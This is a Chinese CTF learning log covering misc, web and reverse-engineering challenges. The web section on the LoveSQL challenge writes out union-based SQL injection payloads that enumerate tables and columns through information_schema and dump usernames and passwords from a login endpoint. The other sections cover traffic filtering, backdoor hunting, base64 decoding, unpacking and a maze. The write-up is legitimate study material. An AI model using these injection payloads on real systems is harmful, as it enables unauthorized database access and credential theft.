当前位置: 首页 > article >正文

2.5学习记录

misc

文件中的秘密

打开附件后用随波逐流一把梭就可以了在这里插入图片描述

被嗅探的流量

这题根据提示需要追踪到请求,在过滤栏输入:

 http.request.method == "POST" 

在这里插入图片描述在第二个包的结尾发现了

后门查杀

这个题打开附件发现一大堆,同时触发火绒监控在这里插入图片描述根据提示后门密码就是flag,在vscode里面找到了
在这里插入图片描述

web

[极客大挑战 2019]LoveSQL

上方提示在这里插入图片描述所以应该是只能手注了随便输一下在这里插入图片描述发现可以交互,判断闭合方式在这里插入图片描述判断应该是单引号闭合,试试万能密码在这里插入图片描述发现没得到flag,但是找到了回显地址在这里插入图片描述
进行联合注入在这里插入图片描述发现2和3有回显位置
在这里插入图片描述继续查询密码处输入1' union select 1,2,database()#
在这里插入图片描述查询数据库在这里插入图片描述接着爆表名1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1#
1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1#

在这里插入图片描述在这里插入图片描述
爆列名1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
在这里插入图片描述两个表爆出来都是这个,接着爆内容

/check.php?username=1&password=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23

在这里插入图片描述太长了查看源码在这里插入图片描述在密码最后发现flag了

re

reverse3

先查壳在这里插入图片描述没壳,放进ida查看,先找到主调函数

int __cdecl main_0(int argc, const char **argv, const char **envp)
{
  size_t v3; // eax
  const char *v4; // eax
  size_t v5; // eax
  char v7; // [esp+0h] [ebp-188h]
  char v8; // [esp+0h] [ebp-188h]
  signed int j; // [esp+DCh] [ebp-ACh]
  int i; // [esp+E8h] [ebp-A0h]
  signed int v11; // [esp+E8h] [ebp-A0h]
  char Destination[108]; // [esp+F4h] [ebp-94h] BYREF
  char Str[28]; // [esp+160h] [ebp-28h] BYREF
  char v14[8]; // [esp+17Ch] [ebp-Ch] BYREF

  for ( i = 0; i < 100; ++i )
  {
    if ( (unsigned int)i >= 0x64 )
      j____report_rangecheckfailure();
    Destination[i] = 0;
  }
  sub_41132F("please enter the flag:", v7);
  sub_411375("%20s", (char)Str);
  v3 = j_strlen(Str);
  v4 = (const char *)sub_4110BE(Str, v3, v14);
  strncpy(Destination, v4, 0x28u);
  v11 = j_strlen(Destination);
  for ( j = 0; j < v11; ++j )
    Destination[j] += j;
  v5 = j_strlen(Destination);
  if ( !strncmp(Destination, Str2, v5) )
    sub_41132F("rigth flag!\n", v8);
  else
    sub_41132F("wrong flag!\n", v8);
  return 0;
}

这里关键是识别函数

v4 = (const char *)sub_4110BE(Str, v3, v14)

这是一个base64加密的函数,点进去查看发现是没有换表的加密在这里插入图片描述接下来去找密文在这里插入图片描述

exp:

import base64

str2='e3nifIH9b_C@n@dH'
flag=''

for i in range(0,len(str2)):
    flag+=chr(ord(str2[i])-i)

print("加密:{}".format(flag))
print("解密:{}".format(base64.b64decode(flag).decode('utf-8')))

在这里插入图片描述

happy new year

拿到附件先查壳在这里插入图片描述发现upx壳,用kali脱壳在这里插入图片描述找到主调函数在这里插入图片描述根据函数解析,得到flag为str2

不一样的flag

查壳在这里插入图片描述32位程序,没壳,用ida查看主调函数在这里插入图片描述发现1234控制上下左右,说明是个迷宫问题,先确定迷宫大小根据:

 if ( v5 == 2 )
    {
      ++*(_DWORD *)&v3[25];
    }
    else if ( v5 > 2 )
    {
      if ( v5 == 3 )
      {
        --v4;

判断迷宫是5*5大小
*1111
01000
01010
00010
1111#
从 *走到#号
222441144222就是flag


http://www.kler.cn/a/532434.html

相关文章:

  • 走向基于大语言模型的新一代推荐系统:综述与展望
  • LabVIEW微位移平台位移控制系统
  • 【汽车电子软件架构】AutoSAR从放弃到入门专栏导读
  • 93,【1】buuctf web [网鼎杯 2020 朱雀组]phpweb
  • 【LLM-agent】(task2)用llama-index搭建AI Agent
  • ieee模版如何修改参考文献的格式以及多作者省略等
  • 什么是数据库代理
  • 从通讯工具到 AI 助理,AI手机如何发展?
  • Jupyter Lab的使用
  • 2.4学习总结
  • 数据结构之时间复杂度与空间复杂度
  • 【Envi遥感图像处理】009:envi5.6设置中文界面的方法
  • 数据库开发常识(10.6)——SQL性能判断标准及索引误区(1)
  • 12.[前端开发]Day12-HTML+CSS阶段练习(网易云音乐一)
  • c++ 冒泡排序
  • 2502,索界面3
  • 第十八章 视图
  • wordpress安装
  • 【Git】一、初识Git Git基本操作详解
  • 阿里云 ROS 与 Terraform:它们的差异与如何选择适合的自动化工具?
  • llama.cpp的C语言API使用
  • Linux环境下的Java项目部署技巧:安装 Nginx
  • 复现论文“去模糊算法”
  • Python分享10个Excel自动化脚本
  • ubuntu ip设置
  • 电路研究9.2.2.1——合宙Air780EP中分组域相关命令分析